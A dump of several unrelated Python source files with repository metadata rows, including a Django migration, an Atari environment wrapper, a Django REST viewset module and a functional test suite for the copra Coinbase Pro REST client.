For percentages above 100%, formats percentages as the nearest whole number.
Formatting examples:
- ``0.00005`` is formatted as ``0.01%``
- ``0.0005`` is formatted as ``0.05%``
- ``0.0`` is formatted as ``0%``
- ``0.1`` is formatted as ``10%``
- ``1.0`` is formatted as ``100%``
- ``0.01555`` is formatted as ``1.56%``
- ``0.1555`` is formatted as ``15.6%``
- ``1.555`` is formatted as ``156%``
- ``15.55`` is formatted as ``1556%``
- ``1555`` is formatted as ``1.6e+05%``
"""
def __call__(self, x, pos=None) -> str:
if x < 1.0:
return f"{x * 100.0:.3g}%"
else:
return f"{round(x * 100.0):.5g}%"
# check consistency of __all__
__tracker.validate()
| 20.234375 | 85 | 0.620849 | 168 | 1,295 | 4.642857 | 0.541667 | 0.141026 | 0.166667 | 0.053846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084577 | 0.223938 | 1,295 | 63 | 86 | 20.555556 | 0.691542 | 0.542857 | 0 | 0 | 0 | 0 | 0.113281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
781f99b5ecc40a218b95def9a0066c13dd3412a9 | 717 | py | Python | logs_manager/migrations/0006_auto_20200724_0722.py | adwait-thattey/raygun_api | 9d5571de452fbf70d34b9583ebc42eb662292f61 | [
"MIT"
] | null | null | null | logs_manager/migrations/0006_auto_20200724_0722.py | adwait-thattey/raygun_api | 9d5571de452fbf70d34b9583ebc42eb662292f61 | [
"MIT"
] | 7 | 2020-06-06T01:40:06.000Z | 2022-02-10T09:12:56.000Z | logs_manager/migrations/0006_auto_20200724_0722.py | adwait-thattey/raygun_api | 9d5571de452fbf70d34b9583ebc42eb662292f61 | [
"MIT"
] | 1 | 2021-08-16T13:23:34.000Z | 2021-08-16T13:23:34.000Z | # Generated by Django 2.1.5 on 2020-07-24 07:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('logs_manager', '0005_auto_20200724_0647'),
]
operations = [
migrations.RemoveField(
model_name='analyticlog',
name='logobject_ptr',
),
migrations.AlterModelOptions(
name='userinteraction',
options={'ordering': ('log_id', 'timestamp')},
),
migrations.RenameField(
model_name='userinteraction',
old_name='analytic_log',
new_name='log_id',
),
migrations.DeleteModel(
name='AnalyticLog',
),
]
| 23.9 | 58 | 0.562064 | 63 | 717 | 6.206349 | 0.68254 | 0.046036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063786 | 0.322176 | 717 | 29 | 59 | 24.724138 | 0.740741 | 0.062762 | 0 | 0.173913 | 1 | 0 | 0.210448 | 0.034328 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7821804bf2b23895276ffd252dcee5238acf418a | 559 | py | Python | test/test_json.py | Zhu-Jianwei/LaTeX-helper | 322bf686d1aee32804013d813d46bd27a4a8325f | [
"MIT"
] | 4 | 2022-03-13T12:02:38.000Z | 2022-03-13T15:30:20.000Z | test/test_json.py | Zhu-Jianwei/LaTeX-helper | 322bf686d1aee32804013d813d46bd27a4a8325f | [
"MIT"
] | null | null | null | test/test_json.py | Zhu-Jianwei/LaTeX-helper | 322bf686d1aee32804013d813d46bd27a4a8325f | [
"MIT"
] | 3 | 2022-02-06T08:05:37.000Z | 2022-02-07T08:26:48.000Z | import json
json_data =r'''
{
"Print to console": {
"prefix": "log",
"body": [
"console.log('$1');",
"$2"
],
"description": "Log output to console"
},
"hello": {
"prefix": "hello",
"body": [
"hello world"
],
"description": "description of hello world."
},
"Basic Blocks": {
"prefix": "bb",
"body": [
"\\b"
],
"description": "null"
}
}
'''
json_dict = json.loads(json_data)
print(json_dict) | 18.032258 | 52 | 0.415027 | 48 | 559 | 4.75 | 0.5 | 0.070175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00597 | 0.400716 | 559 | 31 | 53 | 18.032258 | 0.674627 | 0 | 0 | 0.206897 | 0 | 0 | 0.85 | 0.0375 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7833f40832f2ab477746a194696a73f28e408bad | 1,707 | py | Python | atari/atari.py | neevparikh/lwm | ec8d27f6c011a732aa58ae04cba66a5bac68f8f8 | [
"MIT"
] | 17 | 2020-10-07T08:15:46.000Z | 2022-01-10T02:47:53.000Z | atari/atari.py | neevparikh/lwm | ec8d27f6c011a732aa58ae04cba66a5bac68f8f8 | [
"MIT"
] | null | null | null | atari/atari.py | neevparikh/lwm | ec8d27f6c011a732aa58ae04cba66a5bac68f8f8 | [
"MIT"
] | 2 | 2021-02-19T17:47:17.000Z | 2021-03-07T16:41:54.000Z | import torch
from gym.spaces.box import Box
from baselines import bench
from baselines.common.vec_env.shmem_vec_env import ShmemVecEnv
from baselines.common.atari_wrappers import wrap_deepmind, make_atari
from baselines.common.vec_env import VecEnvWrapper
def make_vec_envs(name, num, seed=0, max_ep_len=100000):
def make_env(rank):
def _thunk():
full_name = f"{name}NoFrameskip-v4"
env = make_atari(full_name, max_episode_steps=max_ep_len)
env.seed(seed + rank)
env = bench.Monitor(env, None)
env = wrap_deepmind(env, episode_life=True, clip_rewards=False)
return env
return _thunk
envs = [make_env(i) for i in range(num)]
envs = ShmemVecEnv(envs, context="fork")
envs = VecTorch(envs)
return envs
class VecTorch(VecEnvWrapper):
def __init__(self, env):
super(VecTorch, self).__init__(env)
obs = self.observation_space.shape
self.observation_space = Box(0, 255, [obs[2], obs[0], obs[1]],
dtype=self.observation_space.dtype)
def _convert_obs(self, x):
return torch.from_numpy(x).permute(0, 3, 1, 2)
def reset(self):
return self._convert_obs(self.venv.reset())
def step_async(self, actions):
assert len(actions.shape) == 2
actions = actions[:, 0].cpu().numpy()
self.venv.step_async(actions)
def step_wait(self):
obs, reward, done, info = self.venv.step_wait()
obs = self._convert_obs(obs)
reward = torch.from_numpy(reward)[..., None].float()
done = torch.tensor(done, dtype=torch.uint8)[..., None]
return obs, reward, done, info
| 33.470588 | 75 | 0.641476 | 232 | 1,707 | 4.512931 | 0.357759 | 0.049666 | 0.054441 | 0.042025 | 0.047755 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017054 | 0.244288 | 1,707 | 50 | 76 | 34.14 | 0.794574 | 0 | 0 | 0 | 0 | 0 | 0.01406 | 0 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.2 | false | 0 | 0.15 | 0.05 | 0.525 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7835bab4723390e294981a238603d58b310e255b | 1,833 | py | Python | 05/scrum/board/views.py | mezklador/lightweight-django | 9ab23cdc76cfd44f7f76c4901bbd77411076d66b | [
"MIT"
] | null | null | null | 05/scrum/board/views.py | mezklador/lightweight-django | 9ab23cdc76cfd44f7f76c4901bbd77411076d66b | [
"MIT"
] | null | null | null | 05/scrum/board/views.py | mezklador/lightweight-django | 9ab23cdc76cfd44f7f76c4901bbd77411076d66b | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from rest_framework import authentication, permissions, viewsets, filters
from .forms import TaskFilter, SprintFilter
from .models import Sprint, Task
from .serializers import SprintSerializer, TaskSerializer, UserSerializer
#from django.shortcuts import render
User = get_user_model()
class DefaultsMixin(object):
"""Default settings for view authentication, permissions, filtering and
pagination"""
authentication_classes = (
authentication.BasicAuthentication,
authentication.TokenAuthentication,
)
permission_classes = (
permissions.IsAuthenticated,
)
paginate_by = 25
paginate_by_param = 'page_size'
max_paginate_by = 100
filter_backends = (
filters.DjangoFilterBackend,
filters.SearchFilter,
filters.OrderingFilter,
)
class SprintViewSet(DefaultsMixin, viewsets.ModelViewSet):
"""API endpoint for listing and creating sprints."""
queryset = Sprint.objects.order_by('end')
serializer_class = SprintSerializer
filter_class = SprintFilter
search_fields = ('name',)
ordering_fields = ('end', 'name',)
class TaskViewSet(DefaultsMixin, viewsets.ModelViewSet):
"""API endpoint for listing and creating tasks."""
queryset = Task.objects.all()
serializer_class = TaskSerializer
search_fields = ('name', 'description',)
ordering_fields = ('name', 'order', 'started', 'due', 'completed',)
class UserViewSet(DefaultsMixin, viewsets.ReadOnlyModelViewSet):
"""Api endpoint for listing users."""
lookup_field = User.USERNAME_FIELD
lookup_url_kwarg = User.USERNAME_FIELD
queryset = User.objects.order_by(User.USERNAME_FIELD)
serializer_class = UserSerializer
search_fields = (User.USERNAME_FIELD,)
| 30.55 | 75 | 0.722313 | 181 | 1,833 | 7.138122 | 0.469613 | 0.037152 | 0.052632 | 0.048762 | 0.100619 | 0.100619 | 0.100619 | 0.100619 | 0.100619 | 0 | 0 | 0.003362 | 0.188762 | 1,833 | 59 | 76 | 31.067797 | 0.865501 | 0.130387 | 0 | 0 | 0 | 0 | 0.042065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.128205 | 0 | 0.74359 | 0.179487 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
783728555589f370b870d328e9622c595d23d1ec | 49,243 | py | Python | tests/functional/rest/test_client.py | terrorizer1980/copra | 2f1262aba63ab70e80b171624da04d7f19829ddf | [
"MIT"
] | 48 | 2018-07-09T00:58:35.000Z | 2021-11-14T01:31:21.000Z | tests/functional/rest/test_client.py | terrorizer1980/copra | 2f1262aba63ab70e80b171624da04d7f19829ddf | [
"MIT"
] | 9 | 2018-08-19T14:55:36.000Z | 2022-03-28T18:44:11.000Z | tests/functional/rest/test_client.py | terrorizer1980/copra | 2f1262aba63ab70e80b171624da04d7f19829ddf | [
"MIT"
] | 17 | 2018-11-11T23:12:15.000Z | 2022-01-24T18:28:20.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Functional tests for `copra.rest.Client` class.
Without any additional user input, this module will test all of the
unauthenticated methods of the copra.rest.Client.
An API key for the Coinbase Pro sandbox is required to test the authenticated
methods. The key information as well as the ids of a few test accounts are
read in to this module as environment variables by the dotenv module from a
file named .env. The .env file must reside in the same directory as this test
module.
An example .env file named .env.sample is provided. To test the authenticated
methods, fill out the .env.sample file accordingly and rename it to .env.
"""
import os.path
if os.path.isfile(os.path.join(os.path.dirname(__file__), '.env')):
from dotenv import load_dotenv
load_dotenv()
else:
print("\n** .env file not found. Authenticated methods will be skipped. **\n")
import asyncio
from datetime import datetime, timedelta
import os
import json
import random
import time
from uuid import uuid4
from asynctest import TestCase, skipUnless, expectedFailure
from dateutil import parser
from copra.rest import APIRequestError, Client, SANDBOX_URL
from copra.rest.client import USER_AGENT
KEY = os.getenv('KEY')
SECRET = os.getenv('SECRET')
PASSPHRASE = os.getenv('PASSPHRASE')
TEST_AUTH = True if (KEY and SECRET and PASSPHRASE) else False
TEST_BTC_ACCOUNT = os.getenv('TEST_BTC_ACCOUNT')
TEST_USD_ACCOUNT = os.getenv('TEST_USD_ACCOUNT')
TEST_USD_PAYMENT_METHOD = os.getenv('TEST_USD_PAYMENT_METHOD')
TEST_USD_COINBASE_ACCOUNT = os.getenv('TEST_USD_COINBASE_ACCOUNT')
HTTPBIN = 'http://httpbin.org'
class TestRest(TestCase):
"""Tests for copra.rest.Client"""
def setUp(self):
self.client = Client(self.loop)
if TEST_AUTH:
self.auth_client = Client(self.loop, SANDBOX_URL, auth=True,
key=KEY, secret=SECRET,
passphrase=PASSPHRASE)
def tearDown(self):
self.loop.create_task(self.client.close())
if TEST_AUTH:
self.loop.run_until_complete(self.auth_client.cancel_all(stop=True))
self.loop.create_task(self.auth_client.close())
# try to avoid public rate limit, allow for aiohttp cleanup and
# all outstanding Coinbase actions to complete
self.loop.run_until_complete(asyncio.sleep(1))
async def test_user_agent(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.get('/user-agent')
self.assertEqual(body['user-agent'], USER_AGENT)
async def test__handle_error(self):
async with Client(self.loop, HTTPBIN) as client:
with self.assertRaises(APIRequestError) as cm:
headers, body = await client.get('/status/404')
async def test_delete(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.delete('/delete')
self.assertEqual(body['args'], {})
self.assertEqual(body['headers']['User-Agent'], USER_AGENT)
self.assertIsInstance(headers, dict)
self.assertIn('Content-Type', headers)
self.assertIn('Content-Length', headers)
params = {'key1': 'item1', 'key2': 'item2'}
headers, body = await client.delete('/delete', params=params)
self.assertEqual(body['args'], params)
async def test_get(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.get('/get')
body['args'].pop('no-cache', None)
self.assertEqual(body['args'], {})
self.assertEqual(body['headers']['User-Agent'], USER_AGENT)
self.assertIsInstance(headers, dict)
self.assertIn('Content-Type', headers)
self.assertIn('Content-Length', headers)
params = {'key1': 'item1', 'key2': 'item2'}
headers, body = await client.get('/get', params=params)
self.assertEqual(body['args'], params)
async def test_post(self):
async with Client(self.loop, HTTPBIN) as client:
headers, body = await client.post('/post')
self.assertEqual(body['form'], {})
self.assertEqual(body['headers']['User-Agent'], USER_AGENT)
self.assertIsInstance(headers, dict)
self.assertIn('Content-Type', headers)
self.assertIn('Content-Length', headers)
data = {"key1": "item1", "key2": "item2"}
headers, body = await client.post('/post', data=data)
self.assertEqual(json.loads(body['data']), data)
async def test_products(self):
keys = {'id', 'base_currency', 'quote_currency', 'base_min_size',
'base_max_size', 'quote_increment', 'display_name', 'status',
'margin_enabled', 'status_message', 'min_market_funds',
'max_market_funds', 'post_only', 'limit_only', 'cancel_only'}
# Sometimes returns 'accesible' as a key. ??
products = await self.client.products()
self.assertIsInstance(products, list)
self.assertGreater(len(products), 1)
self.assertIsInstance(products[0], dict)
self.assertGreaterEqual(len(products[0]), len(keys))
self.assertGreaterEqual(products[0].keys(), keys)
async def test_order_book(self):
keys = {'sequence', 'bids', 'asks'}
ob1 = await self.client.order_book('BTC-USD', level=1)
self.assertIsInstance(ob1, dict)
self.assertEqual(ob1.keys(), keys)
self.assertIsInstance(ob1['bids'], list)
self.assertEqual(len(ob1['bids']), 1)
self.assertEqual(len(ob1['bids'][0]), 3)
self.assertIsInstance(ob1['asks'], list)
self.assertEqual(len(ob1['asks']), 1)
self.assertEqual(len(ob1['asks'][0]), 3)
ob2 = await self.client.order_book('BTC-USD', level=2)
self.assertIsInstance(ob2, dict)
self.assertEqual(ob2.keys(), keys)
self.assertIsInstance(ob2['bids'], list)
self.assertEqual(len(ob2['bids']), 50)
self.assertEqual(len(ob2['bids'][0]), 3)
self.assertIsInstance(ob2['asks'], list)
self.assertEqual(len(ob2['asks']), 50)
self.assertEqual(len(ob2['asks'][0]), 3)
ob3 = await self.client.order_book('BTC-USD', level=3)
self.assertIsInstance(ob3, dict)
self.assertEqual(ob3.keys(), keys)
self.assertIsInstance(ob3['bids'], list)
self.assertGreater(len(ob3['bids']), 50)
self.assertEqual(len(ob3['bids'][0]), 3)
self.assertIsInstance(ob3['asks'], list)
self.assertGreater(len(ob3['asks']), 50)
self.assertEqual(len(ob3['asks'][0]), 3)
async def test_ticker(self):
keys = {'trade_id', 'price', 'size', 'bid', 'ask', 'volume', 'time'}
tick = await self.client.ticker('BTC-USD')
self.assertIsInstance(tick, dict)
self.assertEqual(tick.keys(), keys)
async def test_trades(self):
keys = {'time', 'trade_id', 'price', 'size', 'side'}
trades, before, after = await self.client.trades('BTC-USD')
self.assertIsInstance(trades, list)
self.assertIsInstance(trades[0], dict)
self.assertIsInstance(before, str)
self.assertIsInstance(after, str)
self.assertEqual(len(trades), 100)
self.assertEqual(trades[0].keys(), keys)
trades, before, after = await self.client.trades('BTC-USD', 5)
self.assertEqual(len(trades), 5)
trades_after, after_after, before_after = await self.client.trades('BTC-USD', 5, after=after)
self.assertLess(trades_after[0]['trade_id'], trades[-1]['trade_id'])
trades_before, after_before, before_before = await self.client.trades('BTC-USD', 5, before=before)
if trades_before:
self.assertGreater(trades_before[-1]['trade_id'], trades[0]['trade_id'])
else:
self.assertIsNone(after_before)
self.assertIsInstance(after_after, str)
await asyncio.sleep(20)
trades_before, after_before, before_before = await self.client.trades('BTC-USD', 5, before=before)
if (trades_before):
self.assertGreater(trades_before[-1]['trade_id'], trades[0]['trade_id'])
else:
self.assertIsNone(after_before)
self.assertIsInstance(after_after, str)
async def test_historic_rates(self):
rates = await self.client.historic_rates('BTC-USD', 900)
self.assertIsInstance(rates, list)
self.assertEqual(len(rates[0]), 6)
self.assertEqual(rates[0][0] - rates[1][0], 900)
end = datetime.utcnow()
start = end - timedelta(days=1)
rates = await self.client.historic_rates('LTC-USD', 3600, start.isoformat(), end.isoformat())
self.assertIsInstance(rates, list)
self.assertEqual(len(rates), 24)
self.assertEqual(len(rates[0]), 6)
self.assertEqual(rates[0][0] - rates[1][0], 3600)
async def test_get_24hour_stats(self):
keys = {'open', 'high', 'low', 'volume', 'last', 'volume_30day'}
stats = await self.client.get_24hour_stats('BTC-USD')
self.assertIsInstance(stats, dict)
self.assertEqual(stats.keys(), keys)
async def test_currencies(self):
keys = {'id', 'name', 'min_size', 'status', 'message', 'details'}
currencies = await self.client.currencies()
self.assertIsInstance(currencies, list)
self.assertGreater(len(currencies), 1)
self.assertIsInstance(currencies[0], dict)
self.assertEqual(currencies[0].keys(), keys)
async def test_server_time(self):
time = await self.client.server_time()
self.assertIsInstance(time, dict)
self.assertIn('iso', time)
self.assertIn('epoch', time)
self.assertIsInstance(time['iso'], str)
self.assertIsInstance(time['epoch'], float)
@skipUnless(TEST_AUTH, "Authentication credentials not provided.")
async def test_accounts(self):
keys = {'id', 'currency', 'balance', 'available', 'hold', 'profile_id'}
accounts = await self.auth_client.accounts()
self.assertIsInstance(accounts, list)
self.assertIsInstance(accounts[0], dict)
self.assertGreaterEqual(accounts[0].keys(), keys)
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_account(self):
keys = {'id', 'currency', 'balance', 'available', 'hold', 'profile_id'}
account = await self.auth_client.account(TEST_BTC_ACCOUNT)
self.assertIsInstance(account, dict)
self.assertEqual(account.keys(), keys)
self.assertEqual(account['id'], TEST_BTC_ACCOUNT)
self.assertEqual(account['currency'], 'BTC')
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_account_history(self):
# Assumes market_order works.
orders = []
for i in range(1,6):
size = 0.001 * i
order = await self.auth_client.market_order('buy', 'BTC-USD', size)
orders.append(order)
await asyncio.sleep(0.25)
history, before, after = await self.auth_client.account_history(
TEST_BTC_ACCOUNT, limit=3)
keys = {'amount', 'balance', 'created_at', 'details', 'id', 'type'}
self.assertIsInstance(history, list)
self.assertEqual(len(history), 3)
self.assertEqual(history[0].keys(), keys)
self.assertEqual(history[0]['type'], 'match')
self.assertEqual(history[0]['details']['order_id'], orders[4]['id'])
self.assertEqual(history[0]['details']['product_id'], 'BTC-USD')
after_history, after_before, after_after = await self.auth_client.account_history(TEST_BTC_ACCOUNT, after=after)
self.assertGreater(history[-1]['id'], after_history[0]['id'])
original_history, _, _ = await self.auth_client.account_history(TEST_BTC_ACCOUNT, before=after_before)
self.assertEqual(original_history, history)
@skipUnless(TEST_AUTH and TEST_BTC_ACCOUNT, "Auth credentials and test BTC account ID required")
async def test_holds(self):
# Assumes cancel, cancel_all and limit_order work
await self.auth_client.cancel_all(stop=True)
holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT)
offset = len(holds)
orders = []
for i in range(1, 8):
size = .001 * i
price = 10000 + i * 1000
order = await self.auth_client.limit_order('sell', 'BTC-USD', price, size)
orders.append(order)
await asyncio.sleep(.25)
holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT)
keys = {'amount', 'created_at', 'id', 'ref', 'type'}
self.assertEqual(len(holds), 7 + offset)
self.assertEqual(holds[0].keys(), keys)
self.assertEqual(float(holds[0]['amount']), .007)
self.assertEqual(orders[6]['id'], holds[0]['ref'])
holds, before, after = await self.auth_client.holds(TEST_BTC_ACCOUNT,
limit=5)
self.assertEqual(len(holds), 5)
after_holds, after_before, after_after = await self.auth_client.holds(
TEST_BTC_ACCOUNT, after=after)
self.assertEqual(len(after_holds), 2 + offset)
original_holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT,
before=after_before, limit=5)
self.assertEqual(original_holds, holds)
for order in orders[4:]:
resp = await self.auth_client.cancel(order['id'])
self.assertEqual(resp[0], order['id'])
holds, _, _ = await self.auth_client.holds(TEST_BTC_ACCOUNT)
total = 0
for hold in holds:
if hold['type'] == 'order':
total += float(hold['amount'])
self.assertAlmostEqual(total, 0.01)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_limit_order(self):
# Assumes cancel works
for side, base_price in (('buy', 1), ('sell', 50000)):
# default time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size)
await self.auth_client.cancel(order['id'])
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'time_in_force', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
# client_oid, explicit time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
client_oid = str(uuid4())
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='GTC',
client_oid=client_oid)
await self.auth_client.cancel(order['id'])
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
# IOC time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='IOC')
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'IOC')
# FOK time_in_force
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='FOK')
if 'reject_reason' in order:
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'reject_reason',
'settled', 'side', 'size', 'status', 'time_in_force',
'type'}
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'FOK')
# GTT time_in_force, iterate cancel_after
for ca_str, ca_int in [('min', 60), ('hour', 3600), ('day', 86400)]:
o_time = await self.client.server_time()
o_time = float(o_time['epoch'])
price = base_price + (random.randint(1, 9) / 10)
size = random.randint(1, 10) / 1000
order = await self.auth_client.limit_order(side, 'BTC-USD',
price=price, size=size,
time_in_force='GTT',
cancel_after=ca_str)
await self.auth_client.cancel(order['id'])
keys = {'created_at', 'executed_value', 'expire_time', 'fill_fees',
'filled_size', 'id', 'post_only', 'price', 'product_id', 'settled',
'side', 'size', 'status', 'stp', 'time_in_force', 'type'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), price)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTT')
e_time = parser.parse(order['expire_time']).timestamp()
self.assertLessEqual(e_time - o_time - ca_int, 1.0)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_limit_order_stop(self):
# Assumes cancel works
#stop loss
order = await self.auth_client.limit_order('sell', 'BTC-USD', 2.1, .001,
stop='loss', stop_price=2.5)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'time_in_force', 'type', 'stop',
'stop_price'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), 2.1)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'sell')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
self.assertEqual(order['stop'], 'loss')
self.assertEqual(float(order['stop_price']), 2.5)
#stop entry
order = await self.auth_client.limit_order('buy', 'BTC-USD', 9000, .001,
stop='entry', stop_price=9550)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'id', 'post_only', 'price', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'time_in_force', 'type', 'stop',
'stop_price'}
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['price']), 9000)
self.assertEqual(float(order['size']), .001)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], 'buy')
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'limit')
self.assertEqual(order['time_in_force'], 'GTC')
self.assertEqual(order['stop'], 'entry')
self.assertEqual(float(order['stop_price']), 9550)
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_market_order(self):
# Assumes cancel works
for side in ('buy', 'sell'):
# Size
size = random.randint(1, 10) / 1000
order = await self.auth_client.market_order(side, 'BTC-USD', size=size)
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'funds', 'id', 'post_only', 'product_id', 'settled', 'side',
'size', 'status', 'stp', 'type'}
if side == 'sell':
keys.remove('funds')
self.assertEqual(order.keys(), keys)
self.assertEqual(float(order['size']), size)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
await asyncio.sleep(.5)
# Funds
funds = 100 + random.randint(1, 10)
order = await self.auth_client.market_order(side, 'BTC-USD', funds=funds)
keys = {'created_at', 'executed_value', 'fill_fees', 'filled_size',
'funds', 'id', 'post_only', 'product_id', 'settled', 'side',
'specified_funds', 'status', 'stp', 'type'}
if side == 'sell':
keys.add('size')
self.assertEqual(order.keys(), keys)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(float(order['specified_funds']), funds)
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
await asyncio.sleep(.5)
#client_oid
client_oid = str(uuid4())
order = await self.auth_client.market_order('sell', 'BTC-USD', funds=100,
client_oid=client_oid, stp='dc')
self.assertEqual(order.keys(), keys)
self.assertEqual(order.keys(), keys)
self.assertEqual(order['product_id'], 'BTC-USD')
self.assertEqual(order['side'], side)
self.assertEqual(order['stp'], 'dc')
self.assertEqual(float(order['funds']), 100)
self.assertEqual(order['type'], 'market')
self.assertEqual(order['post_only'], False)
await asyncio.sleep(.5)
# This really shouldn't raise an error, but as of 11/18, the Coinbase
# sandbox won't accept an stp other dc even though the Coinbase API
# documentation claims otherwise.
with self.assertRaises(APIRequestError):
order = await self.auth_client.market_order('sell', 'BTC-USD',
funds=100, client_oid=client_oid, stp='cb')
@skipUnless(TEST_AUTH, "Auth credentials required")
async def test_market_order_stop(self):
# Assumes cancel works
# stop loss
order = await self.auth_client.market_order('sell', 'BTC-USD', .001,
stop='loss', stop_price=2.5)
try:
await self.auth_client.cancel(order['id'])
except APIRequestError:
pass
